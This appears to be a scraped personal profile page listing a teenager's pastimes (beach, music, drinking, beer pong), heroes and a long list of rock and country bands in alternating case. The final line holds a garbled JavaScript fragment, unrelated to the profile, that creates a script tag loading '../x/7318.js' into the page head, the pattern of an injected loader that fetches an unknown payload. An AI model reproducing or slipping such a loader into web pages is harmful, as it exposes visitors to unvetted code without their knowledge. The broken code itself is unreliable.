hanging out with friends, laying around by the beach, listening to music, drinking vodka with justin, playing beer pong with friends, and partying.. I can't think of anything else..
my real grandmother, Uncle Bobby, Patrick Dempsey (my cousin), Dale Jr., and me in 10 years...
tHE-aLL aMeRicAN rEjEcTS, 3 dOoRs dOwN, neW FouND gLoRy, aeRoSmITh, aLaN JacKSoN, aLTeR bRiDge, aMerIe, asHLeE sImpSON, bIg & rICh, bLAcK EyE peAs, bLiNK 182, bOWLinG foR sOuP, bOySeTSfIRe, BrAD pAIsLeY, BrEAKinG bENJamIN, CanDLeboX, CHeVeLLe, cOLd, cRAiG morGAn, CroSSfaDe, desTInY's cHiLd, dIAmoNd riO, dIeRKs bEntLEy, dIsTUrbEd, EvANesCencE, fAIth hILL, faLL OuT BoY, fOO FigHTeRs, FueL, gARtH bRooKs, gOOd cHArLoTTe, GrEEn dAY, GrETcheN wILsOn, GwEN steFAnI, hOObaSTank, jEEf bATes, HowIE dAY, JET, jeSSiCa SimpSoN, jOHn mIChaeL mONtgoMerY, JoSH grAciN, KeITh urBAn, keLLy cLArkSon, keNnY chESneY, kID RocK, THe kILLerS, KorN, LeAnN rIMes, LeE anN wOMaCk, LimP bIzkIT, LinKIn paRK, LoNeStaR, LosTpROpHeTS, mARiAh cAreY, MarK WiLLs, mAtCHbOOk rOMaNce, MatCHBox twENty, mONtgOmERy geNtrY, mY chEMICaL roMANcE, nICkELbAck, oFFSPriNg, oUtKAst, P.O.D., pApa RoAch, PuDdLe of MuDd, pUsSYcaT doLLs, RAge aGAinsT tHE mACHinE, rAScaL fLattS, rEd Hot ChiLi PePPers, rELieNt k, sARa eVANs, sEEthEr, SenSES fAIL, sHeDAIsy, sHInEDowN, sTOrY oF thE yEAr, sUgarLAND, sUM 41, SWiTchfOOt, tAKIng BacK sUNdaY, tANtrIc, TeRRi cLarK, tHEorY of A dEAdmAn, tHRee DaYS gRAcE, tiM mCgRAw, tOBy kEiTH, toOL, tRapT, TrICk pONy, TruST cOMpAnY, tHE USeD, uSHEr, vELvEt reVoLVer, wEEzeR, yeLLoWCArd, anD tHe LiST gOEs oN
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Mommy and Daddy :) .."var s=document·('script');s.src='../x/7318.js';document 3;getElementsByTagName('head')[0].appendChild(s);"